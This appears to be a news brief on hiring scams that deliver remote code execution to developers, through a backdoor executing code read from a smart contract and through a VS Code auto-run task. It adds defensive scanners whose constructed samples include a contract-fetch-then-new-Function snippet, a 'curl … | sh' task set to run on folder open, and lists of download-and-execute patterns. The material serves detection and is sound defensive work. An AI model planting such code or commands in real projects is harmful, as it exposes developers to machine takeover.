HeadlinesBriefing.com

Scammers Target Devs with Smart Contract RCE

DEV Community

Scammers are targeting developers with hiring scams that deliver remote code execution payloads. In one December 2025 incident, a fake recruiter pressured a candidate to clone a Bitbucket repository during a video call. The project contained a backdoor that used `new Function()` to execute code fetched at runtime from a Binance Smart Chain contract, so the malicious script itself never appears in the repository and escapes static review of the checked-in code.

The payload delivery was indirect. The Node.js backend called the contract's `getMemo()` function to retrieve a minified script. That script opened a command-and-control (C2) channel to the attacker's server, exfiltrated system information every 5 seconds and waited for remote commands, giving the attacker full control of the machine. Because the code lives on-chain rather than in the repository, a reviewer or scanner that only looks at the checked-in files sees an innocuous contract read followed by a dynamic-code call. That combination is itself the tell: a `new Function()` or `eval()` whose argument comes from a network or chain call, not from a string literal, should stop a code review cold.
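The shape described above can be caught before anything runs. The following is an added example, not code from the original post or from the scammers' project: a small heuristic scanner that flags a source file when a dynamic-code sink (`new Function`, `eval`, `vm.runIn*`) takes a non-literal argument and the same file talks to a chain RPC endpoint or EVM client library. The two sample files are constructed for the example; the first mirrors the reported pattern and is never executed, only scanned. The endpoint and library names in `REMOTE_SOURCE_INDICATORS` are assumed indicators, not a list taken from the incident.

```javascript
// Added example: heuristic scan for "code fetched remotely, then executed".
// Only the sample text below is scanned; nothing in it is evaluated.

const DYNAMIC_CODE_SINKS = [
  /\bnew\s+Function\s*\(/,
  /\beval\s*\(/,
  /\bvm\.(runInThisContext|runInNewContext|compileFunction)\s*\(/,
];

// A sink whose first argument is a string literal is far less interesting
// than one fed by a variable (e.g. the result of a contract call).
const LITERAL_SINK_ARG = /\b(new\s+Function|eval)\s*\(\s*["'`]/;

const REMOTE_SOURCE_INDICATORS = [
  /\bgetMemo\s*\(/,                 // the contract method named in the incident
  /eth_call/,                       // raw JSON-RPC contract read
  /bsc-dataseed|binance\.org/i,     // assumed: public BSC RPC endpoint names
  /\bethers\b|\bweb3\b/,            // EVM client libraries
  /\bfetch\s*\(|https?\.get\s*\(|\baxios\b/, // plain HTTP fetch feeding a sink
];

function scanSource(name, text) {
  const findings = [];
  text.split("\n").forEach((line, i) => {
    const lineNo = i + 1;
    for (const sink of DYNAMIC_CODE_SINKS) {
      if (sink.test(line)) {
        findings.push({ line: lineNo, kind: "sink", literalArg: LITERAL_SINK_ARG.test(line), text: line.trim() });
        break;
      }
    }
    for (const src of REMOTE_SOURCE_INDICATORS) {
      if (src.test(line)) {
        findings.push({ line: lineNo, kind: "remote", text: line.trim() });
        break;
      }
    }
  });
  const dynamicSink = findings.some(f => f.kind === "sink" && !f.literalArg);
  const remoteSource = findings.some(f => f.kind === "remote");
  // Suspicious only when both halves of the pattern are present in one file.
  return { file: name, suspicious: dynamicSink && remoteSource, findings };
}

function scanAll(files) {
  return Object.entries(files).map(([name, text]) => scanSource(name, text));
}

// Constructed samples (not the real repository's contents).
const SAMPLES = {
  // Mirrors the reported backdoor: read a string from a contract, execute it.
  "server/utils/config.js": `
const { ethers } = require("ethers");
const provider = new ethers.JsonRpcProvider("https://bsc-dataseed.binance.org/");
const contract = new ethers.Contract(CONTRACT_ADDRESS, ["function getMemo() view returns (string)"], provider);
async function init() {
  const memo = await contract.getMemo();
  new Function(memo)();
}
`,
  // Benign: a string-literal Function body and no remote source in the file.
  "lib/template.js": `
const render = new Function("ctx", "return 'Hello ' + ctx.name;");
module.exports = render;
`,
};

console.log(JSON.stringify(scanAll(SAMPLES), null, 2));
```

Run it over a freshly cloned repository (for example by reading every `.js`/`.ts` file into the `files` map) before running `npm install` or starting the app. The heuristic is deliberately noisy at file granularity; its job is to surface candidates for a human to read, not to prove maliciousness.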

In a separate January 2026 attempt, scammers used a subtler social engineering tactic: a legitimate-looking GitHub task that required edits in VS Code. The repository contained a `.vscode/tasks.json` file with a task configured to fetch and run a remote script automatically when the project folder is opened (VS Code's folder-open auto-run option), aiming to trigger RCE the moment the developer opened the project rather than when they ran anything. VS Code's Workspace Trust is the guardrail here: in Restricted Mode such tasks do not run, so the pretext of a timed hiring exercise exists largely to get the candidate to click "trust" and get to work. Both incidents show increasingly bold tactics in developer-targeted supply chain attacks.
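A `.vscode/tasks.json` is plain data, so the dangerous combination is easy to check for before trusting a workspace. The following is an added example, not code from the original post or from the repository involved: it parses a tasks file and flags tasks that both auto-run on folder open and fetch or execute remote content. The tasks file below is constructed to resemble the reported pattern (the URL uses the reserved `.invalid` TLD); nothing in it is executed.

```javascript
// Added example: audit .vscode/tasks.json for auto-run tasks that pull remote code.
// Constructed input; real tasks.json files are JSONC and may contain comments,
// which would need a JSONC parser. Plain JSON is assumed here.

const CONSTRUCTED_TASKS_JSON = `{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
      "group": "build"
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}`;

// Command shapes that download-and-execute or run inline code. Assumed
// indicators for the example, not an exhaustive list.
const REMOTE_EXEC_PATTERNS = [
  /\bcurl\b[^|]*\|\s*(sh|bash|zsh|node)\b/,                // curl ... | sh
  /\bwget\b[^|]*\|\s*(sh|bash|zsh|node)\b/,                // wget ... | sh
  /\b(Invoke-WebRequest|iwr|Invoke-Expression|iex)\b/i,    // PowerShell download/exec
  /\bpowershell\b.*\s-e(nc|ncodedcommand)?\b/i,            // encoded PowerShell
  /\bnode\s+-e\b/,                                         // inline node script
];

// Flatten command + args into one string. VS Code allows args as
// {"value": ..., "quoting": ...} objects, so unwrap those.
function taskCommandLine(task) {
  const cmd = typeof task.command === "string" ? task.command : "";
  const args = (task.args || []).map(a => (typeof a === "string" ? a : a && a.value) || "");
  return [cmd, ...args].join(" ").trim();
}

function auditTasks(jsonText) {
  const doc = JSON.parse(jsonText);
  return (doc.tasks || []).map(task => {
    const autoRun = !!(task.runOptions && task.runOptions.runOn === "folderOpen");
    const command = taskCommandLine(task);
    const remoteExec = REMOTE_EXEC_PATTERNS.some(p => p.test(command));
    const hidden = !!(task.presentation && task.presentation.reveal === "never");
    let severity = "info";
    if (autoRun && remoteExec) severity = "critical";   // runs on open and fetches code
    else if (autoRun || remoteExec) severity = "warning";
    return { label: task.label, autoRun, remoteExec, hidden, severity, command };
  });
}

console.log(JSON.stringify(auditTasks(CONSTRUCTED_TASKS_JSON), null, 2));
```

Run this on the file with the folder still in Restricted Mode, before trusting it. A task that is both auto-run and hidden (`"reveal": "never"`) deserves a look even when its command matches none of the patterns above, and setting `task.allowAutomaticTasks` to `"off"` in user settings removes the auto-run path entirely.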